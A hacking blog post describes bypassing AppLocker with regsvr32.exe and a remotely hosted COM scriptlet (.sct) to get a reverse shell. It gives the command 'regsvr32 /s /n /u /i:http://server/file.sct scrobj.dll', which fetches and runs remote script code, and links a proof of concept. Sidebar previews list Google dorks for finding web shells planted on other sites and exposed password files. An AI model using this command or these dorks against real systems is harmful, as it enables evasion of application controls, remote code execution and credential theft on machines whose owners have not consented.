Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)

By -

Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)
===============================================

THIS VULNERABILTY WAS DISCOVERED BY MY FRIEND
PLX-2M   

(In this article all the "I" refers to he himself)

So, I have been working this out the last few days. I was trying solve a particular problem.

I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.

tl;dr "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"

I have been researching fileless persistence mechanisms.  And it led me to a dark place.  I would wish on no mortal.  COM+.

I posted earlier about .sct files. This link describes what they are. In short they are XML documents, that allow you to register COM objects that are backed not by a .dll but scripts.

Inside COM+

However, I wasn't really happy with what I had found since it required Admin rights in order to execute.  I could register the script to bypass AppLocker, but I still had to instantiate the object to trigger the code execution.

Then, I decided to place the script block inside of the Registration tag. Bam! Now all I had to do was call the regsvr32 and the code would execute. Still... That whole admin problem...

After pouring over hellish COM+ forums from 1999, I found a reference that stated that the code in the registration element executes on register and unregister.

I logged in as a normal user and right clicked the .sct file and chose "unregister" and... It worked.

That was it.

The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc...And.. You guessed a signed, default MS binary.  Whohoo.

So, all you need to do is host your .sct file at a location you control. From the target, simply execute

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Its not well documented that regsvr32.exe can accept a url for a script.

In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element.

Hopefully this makes sense.

In order to further prove this out, I wrote a PowerShell server to handle execution and return output.

I hope this is helpful and that it makes sense.

There is ALOT more to explore here, so please, send me feedback if you find this helpful.
[Update]
- You can also call a local file too.  If you really wanted to...
- This does not ACTUALLY register the COM object.  So nothing is in the registry... BONUS 

FOR THE PROOF OF CONCEPT CLICK ON THE BELOW LINK

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

Comments

Post a Comment

Popular posts from this blog

Keyboard Shortcuts That you must learn

By -
Image
Keyboard Shortcuts That you must learn Getting used to using keyboard exclusively and leaving your mouse behind will make you much efficient at performing any task on window system.Some of the shortcuts that must be known Windows+R=Run menu This is usually followed by cmd=Command Prompt iexplore+"web address"=Internet Explorer compmgmt.msc=Computer Management dhcpmgmt.msc=DHCP Management dnsmgmt.msc=DNS  Management services.msc=Services eventvwr=Event Viewer dsa.msc=Active Directory users and Computers dssite.msc=Active Directory  Sites and Services Windows key + E= Explorer ALT+TAB=Switch between windows ALT,Space,X=Maximize Windows CTRL+SHIFT+ESC=Task Manger Windows key+Break=System Properties Windows key + F= Search Windows key + D=Hide/Display all windows Keep in mind that the "Right Click" key next to the right windows on keyboard.Using the arrows and that key can get just about anything done once you've opened up any prog
Read more

Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks

By -
Image
Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks torsocks  allows you to use most applications in a safe way with TOR. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using. In this post we will cover IP spoofing in Kali Linux with torsocks which will allow users to connect to certain services that is banned to them.  torsocks  is an ELF shared library that is loaded before all others. The library overrides every needed Internet communication libc function calls such as connect() or gethostbyname(). This process is transparent to the user and if  torsocks  detects any communication that can’t go through the Tor network such as UDP traffic, for instance, the connection is denied. If, for any reason, there is no way for  torsocks  to provide the Tor anonymity guarantee to your application,  torsocks  will force the application to quit and stop everything.  In this article I will guide
Read more

How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks)

By -
How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks) How To Find Uploaded shell By Google dork (priv8 dorks) Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !! Dorks for finding shells  inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"  "Shell" filetype:php intext:"uname -a:" "EDT 2010" intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update  Dorks for finding Passwords filetype:htpasswd htpasswd intitle:"index of" ".htpasswd" -intitle
Read more